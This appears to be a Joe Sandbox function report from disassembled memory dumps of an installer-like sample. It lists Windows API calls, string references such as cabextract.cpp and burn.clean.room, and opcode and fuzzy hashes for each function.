API ID: CreateDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: 27dfd3e0547e703de0a9708a53b7df9e629c2c188bbb6d14d7ad2697fef54793
Instruction ID: 13c10b8d22eb1cf58ce5fc7bca7e9fd51ca80c8b068550a6d1d65b81cf3d1ad5
Opcode Fuzzy Hash: 27dfd3e0547e703de0a9708a53b7df9e629c2c188bbb6d14d7ad2697fef54793
Instruction Fuzzy Hash: 9311F026A00B3596DB331AA65C40B3BB664EF75BBBF110025FF04AB150E364ACC5B291

Function 00F63AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F90F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00FBAAA0,00000000,?,00F957E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00F90F80

RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00F63FB5,feclient.dll,?,00000000,?,?,?,00F54B12), ref: 00F63B42

Part of subcall function 00F910B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00F9112B
Part of subcall function 00F910B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00F91163

Strings

SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 00F63AB7
Logging, xrefs: 00F63AD4
feclient.dll, xrefs: 00F63AAB

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
API String ID: 1586453840-3596319545
Opcode ID: f5434d5eae4350c18742be484281000156c7fb665b5a66c9bdbffd80c62b7ab0
Instruction ID: d764bcc6bf201359628f63a0c58d0c9e9f26f181ac93f658fea06db2bc9a7b70
Opcode Fuzzy Hash: f5434d5eae4350c18742be484281000156c7fb665b5a66c9bdbffd80c62b7ab0
Instruction Fuzzy Hash: 16119076E40208BBEB21DB95DD82EBEBBB8EB80B24F500065E501AB091D6719F81F750

Function 00F90764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(00F6E93B,00000000,00000000,?,?,?,00F90013,00F6E93B,00F6E93B,?,00000000,0000FDE9,?,00F6E93B,8000FFFF,Unexpected return value from message pump.), ref: 00F90776
WriteFile.KERNELBASE(00000220,00000000,00000000,?,00000000,?,?,00F90013,00F6E93B,00F6E93B,?,00000000,0000FDE9,?,00F6E93B,8000FFFF), ref: 00F907B2
GetLastError.KERNEL32(?,?,00F90013,00F6E93B,00F6E93B,?,00000000,0000FDE9,?,00F6E93B,8000FFFF,Unexpected return value from message pump.), ref: 00F907BC

Strings

logutil.cpp, xrefs: 00F907ED

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: 7aa01911cf7e1aceb62c902ff2305e63a0217ed79d725205d3dbf48254b5b081
Instruction ID: 1a7b7f3c303b0daf9ce9cabc187a9a9e4598b17ee4875305ca9a1438085a7ca9
Opcode Fuzzy Hash: 7aa01911cf7e1aceb62c902ff2305e63a0217ed79d725205d3dbf48254b5b081
Instruction Fuzzy Hash: A7118A73941129BFD7109BAA9D84AAFBA6CEB44771B110325FE05D7140DF70AD40FAE1

Function 00F709EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00F70A19,?,?,?), ref: 00F71434
Part of subcall function 00F7140C: GetLastError.KERNEL32(?,00F70A19,?,?,?), ref: 00F7143E

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00F70A27
GetLastError.KERNEL32 ref: 00F70A31

Strings

Failed to read during cabinet extraction., xrefs: 00F70A5F
cabextract.cpp, xrefs: 00F70A55

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: 59c3365119376556dddedc23c95dd6f86b8a217fe65eed5a4f7a9399a07646d0
Instruction ID: 240453dfaa26da45934887ff74c04b2c5ca8d31fe59d251eb7f159c1cd7929c2
Opcode Fuzzy Hash: 59c3365119376556dddedc23c95dd6f86b8a217fe65eed5a4f7a9399a07646d0
Instruction Fuzzy Hash: F511C277900229FBDB219F95DD04E9E7B68FF09760F018156FD08A7250DB349910E6D2

Function 00F7140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00F70A19,?,?,?), ref: 00F71434
GetLastError.KERNEL32(?,00F70A19,?,?,?), ref: 00F7143E

Strings

Failed to move to virtual file pointer., xrefs: 00F7146C
cabextract.cpp, xrefs: 00F71462

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: fa3ec5cc3226a4ed5f13943c14c2be0875a31a351642570e728a483cfcec9398
Instruction ID: 58d20be6fb3624a9ff0074ec593b2d2ac783b84c8b56e353108eeb8aa0f5c29b
Opcode Fuzzy Hash: fa3ec5cc3226a4ed5f13943c14c2be0875a31a351642570e728a483cfcec9398
Instruction Fuzzy Hash: 22018437940639BB87219F9A9C04A9BBB24FF01B71711C126FD1C56151D725D814E6D2

Function 00F707B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00F9B478,00000000,?,00F71717,?,00000000,?,00F5C287,?,00F55405,?,00F675A5,?,?,00F55405,?), ref: 00F707BF
GetLastError.KERNEL32(?,00F71717,?,00000000,?,00F5C287,?,00F55405,?,00F675A5,?,?,00F55405,?,00F55445,00000001), ref: 00F707C9

Strings

Failed to set begin operation event., xrefs: 00F707F7
cabextract.cpp, xrefs: 00F707ED

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: 9873b28ab3d9e4d398118dcae6a8a143aeb70858ca49c5d55a3b7cf630e152a1
Instruction ID: 97de502ebbd15a28c764bea191750f81afe66d340306f78b391be842fa58f18f
Opcode Fuzzy Hash: 9873b28ab3d9e4d398118dcae6a8a143aeb70858ca49c5d55a3b7cf630e152a1
Instruction Fuzzy Hash: 1BF02733A42234A7822053995D05A8F77849E05BB17014067FE08BB180EB18AC00F2D7

Function 10010024 Relevance: 6.0, APIs: 4, Instructions: 26memorylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 10010036
Sleep.KERNELBASE ref: 10010048
GetProcessHeap.KERNEL32 ref: 10010057
HeapAlloc.KERNEL32 ref: 1001006C
GetProcAddress.KERNEL32 ref: 100100A0
GetProcAddress.KERNEL32 ref: 10010191
CreateProcessW.KERNELBASE ref: 100101DD

Memory Dump Source

Source File: 00000007.00000002.2465839398.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2465816568.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465992773.0000000010089000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466010924.000000001008A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466028012.000000001008F000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_AppsLo.jbxd

Similarity

API ID: AddressHeapProcProcess$AllocCreateHandleModuleSleep
String ID:
API String ID: 89199105-0
Opcode ID: 950a509750ffc8f1610e82142d687e4c9373de8a157bcb66bc9af9c67793b6b5
Instruction ID: 2040b18ac1b8698d3e43ff7847e458a2a820da83c004affbb0587afc889ed5cb
Opcode Fuzzy Hash: 950a509750ffc8f1610e82142d687e4c9373de8a157bcb66bc9af9c67793b6b5
Instruction Fuzzy Hash: E5F05EB09042128FF300BF78C98861A3FF4FB45340F418528E88583214EF3894C58B92

Function 00F55123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00F51104,?,?,00000000), ref: 00F55142
CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00F51104,?,?,00000000), ref: 00F55172

Strings

burn.clean.room, xrefs: 00F5512F, 00F5513C, 00F55169

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: f71500b5e44a072e2a509d4f35db57c21b1e885aa71a397ca397e3a616b3ddc4
Instruction ID: 8de2dd429a660048de9a3c4c45a6f6f6ec333c9156e8059a004b7ee96e589054
Opcode Fuzzy Hash: f71500b5e44a072e2a509d4f35db57c21b1e885aa71a397ca397e3a616b3ddc4
Instruction Fuzzy Hash: 0E016272900928BF87304B48ADD4A73BBACEB15B71B104216FA05D7610D7749C45EBA1

Function 1001008A Relevance: 4.6, APIs: 3, Instructions: 86libraryloaderprocessCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 100100A0
GetProcAddress.KERNEL32 ref: 10010191
CreateProcessW.KERNELBASE ref: 100101DD

Memory Dump Source

Source File: 00000007.00000002.2465839398.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2465816568.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465992773.0000000010089000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466010924.000000001008A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466028012.000000001008F000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_AppsLo.jbxd

Similarity

API ID: AddressProc$CreateProcess
String ID:
API String ID: 4077384215-0
Opcode ID: ad70e93e966d263fbbf2108cb8d60dcfe2034383debb7e0f596ecb1c8346d2fb
Instruction ID: 905d80d8a206a4052b8d1577da9d97e865a115dd17d5b9b0c998d49a54522880
Opcode Fuzzy Hash: ad70e93e966d263fbbf2108cb8d60dcfe2034383debb7e0f596ecb1c8346d2fb
Instruction Fuzzy Hash: 3541F570908381DAE721DF28C59435BBFF0BF96308F45894DE5C48B291D7BA9598CB93

Function 00F53838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00F53877
GetLastError.KERNEL32 ref: 00F53881
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 00F538EA

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: 8533c25697cfaa79ab3f8bc82578169d729b0fb4dcb9ac92d9122df4e9c8ad0e
Instruction ID: 786aee5c5cb13418e95d577d6b8d594a7c2b10b9945d0da238428417c9112ef3
Opcode Fuzzy Hash: 8533c25697cfaa79ab3f8bc82578169d729b0fb4dcb9ac92d9122df4e9c8ad0e
Instruction Fuzzy Hash: E9213AB3D0133DA7DB209B699C45F9A7B689B007A2F1101A5BF14E7241D674DE48A7D0

Function 00F53A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00F53BB6,00000000,?,00F51474,00000000,7694B390,00000000,7694B390,00000000,?,?,00F513B8), ref: 00F53A20
RtlFreeHeap.NTDLL(00000000,?,00F53BB6,00000000,?,00F51474,00000000,7694B390,00000000,7694B390,00000000,?,?,00F513B8,?,00000100), ref: 00F53A27
GetLastError.KERNEL32(?,00F53BB6,00000000,?,00F51474,00000000,7694B390,00000000,7694B390,00000000,?,?,00F513B8,?,00000100,?), ref: 00F53A31

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: 62718a2f0023d9089ba4f25984233d2ee4a9776ba8aa6b5ed9767933b8a65163
Instruction ID: 5fa49e3c66f144e89972280c3bbc4a87e3f71f5b8cb51eafff8e8e22b8f5ef27
Opcode Fuzzy Hash: 62718a2f0023d9089ba4f25984233d2ee4a9776ba8aa6b5ed9767933b8a65163
Instruction Fuzzy Hash: 39D01277E0453D57872117EA6D5C95B7E58EF04AF27020126FE44D6230D725CD40A6E4

Function 00F5F755 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F90F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00FBAAA0,00000000,?,00F957E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00F90F80

RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,00F67D59,?,?,?), ref: 00F5F7B9

Part of subcall function 00F91026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,00F5F78E,00000000,Installed,00000000,?), ref: 00F9104B

Strings

Installed, xrefs: 00F5F781

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Installed
API String ID: 3677997916-3662710971
Opcode ID: b504060fa6932873676aaaa5481fa324a494ca44a812134a0cac3fff13b84fdc
Instruction ID: e7b5c1b0d89d5a22e17ed95c95f56b5fd40f7d79d60da44d939c4a2f45f1312e
Opcode Fuzzy Hash: b504060fa6932873676aaaa5481fa324a494ca44a812134a0cac3fff13b84fdc
Instruction Fuzzy Hash: C301A236820118FFCB11DB94DD46BDEBBB8EF04722F1141A5F900A7120D7769E58EB90

Function 00F90F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00FBAAA0,00000000,?,00F957E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00F90F80

Strings

regutil.cpp, xrefs: 00F90FC3

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
API String ID: 71445658-955085611
Opcode ID: 60fa11efa3c8047c3ef4f68a9298dcf240bb648e1630be8d9a457a17c0616011
Instruction ID: 6a9e320ad9875b7a988ef4e1cdd4fe28bd8e2bbe6d6e053bb7c4445ee9b23d0f
Opcode Fuzzy Hash: 60fa11efa3c8047c3ef4f68a9298dcf240bb648e1630be8d9a457a17c0616011
Instruction Fuzzy Hash: C9F02B33A011367FBF30055A8C05BABBE4ADF847B4F154135BE4A9E250EE618D00B6F0

Function 00F8F4AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F8F491

Part of subcall function 00F9998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F99A09
Part of subcall function 00F9998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F99A1A

Strings

PA9l, xrefs: 00F8F48B

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PA9l
API String ID: 1269201914-3515979648
Opcode ID: 765c26431557f7998b1ea2fb41af3ee71518b2d3fdd58571e8d3ee85aeb0d0a5
Instruction ID: c1becc81d82d0eebe99dcc8ce19a107832181f16147dbb80c3c7bfa64b803e68
Opcode Fuzzy Hash: 765c26431557f7998b1ea2fb41af3ee71518b2d3fdd58571e8d3ee85aeb0d0a5
Instruction Fuzzy Hash: 72B012A237D5016C3B48A11B5C02DB7110CC1C5F6133182AFF000C1041EC804C45B533

Function 00F8F49A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F8F491

Part of subcall function 00F9998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F99A09
Part of subcall function 00F9998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F99A1A

Strings

PA9l, xrefs: 00F8F48B

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PA9l
API String ID: 1269201914-3515979648
Opcode ID: 44fa18b37f55ab75801d33a81b231b6e3bd5f847b058543d25a1bcf5ddac468f
Instruction ID: a9b066b447aad68c7b0ecf05dce418dbc19800fd41e0032666a22c6e56ae2738
Opcode Fuzzy Hash: 44fa18b37f55ab75801d33a81b231b6e3bd5f847b058543d25a1bcf5ddac468f
Instruction Fuzzy Hash: A7B012B237D4016D3B48A11B5D13DB7110CC1C5F6133141AFB000C1041EC854C06B533

Function 00F8F479 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F8F491

Part of subcall function 00F9998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F99A09
Part of subcall function 00F9998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F99A1A

Strings

PA9l, xrefs: 00F8F479, 00F8F48B

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PA9l
API String ID: 1269201914-3515979648
Opcode ID: c4d237b83e100c51b277f6e9a52624cca3a53980c7d64601c94bb69d61085b0b
Instruction ID: a3f7a70a6a2c0fe354a26c73837a519a1338aa2df24377ac621a88ebdbeb3290
Opcode Fuzzy Hash: c4d237b83e100c51b277f6e9a52624cca3a53980c7d64601c94bb69d61085b0b
Instruction Fuzzy Hash: 9EB012A637D4017C3B0861175C02CB7110CC5C1F61331C2AFB400C0041AC804C05B433

Function 00F5394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00F52274,?,00000001,7694B390,8000FFFF,?,?,00F90267,?,?,00000000,00000000,8000FFFF), ref: 00F53960
RtlAllocateHeap.NTDLL(00000000,?,00F52274,?,00000001,7694B390,8000FFFF,?,?,00F90267,?,?,00000000,00000000,8000FFFF), ref: 00F53967

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: fefec04e69cfeed1d8f368a2d643a757a7a8e109aaaf2b13cc3098396150d115
Instruction ID: 0807c421dd8b20a1a945a276d0e117d8dee1dec185c0c58efe23d4c6997cd053
Opcode Fuzzy Hash: fefec04e69cfeed1d8f368a2d643a757a7a8e109aaaf2b13cc3098396150d115
Instruction Fuzzy Hash: A8C0123259420CA78B005FF4EC0DC56379CB714A027048401B505C2130C739E0509760

Function 100101EA Relevance: 3.0, APIs: 2, Instructions: 10libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 100101EE
ExitProcess.KERNEL32 ref: 1001020E

Memory Dump Source

Source File: 00000007.00000002.2465839398.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2465816568.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2465992773.0000000010089000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466010924.000000001008A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2466028012.000000001008F000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_AppsLo.jbxd

Similarity

API ID: AddressExitProcProcess
String ID:
API String ID: 2796388413-0
Opcode ID: ab77cb24c1db182cc5b4928a80be7f58cc3f0ff1ec30169333ec9758b075fb51
Instruction ID: b844700c5a2f163abeb807b0b02adc6691dac62e2674852d0bae511e25b11171
Opcode Fuzzy Hash: ab77cb24c1db182cc5b4928a80be7f58cc3f0ff1ec30169333ec9758b075fb51
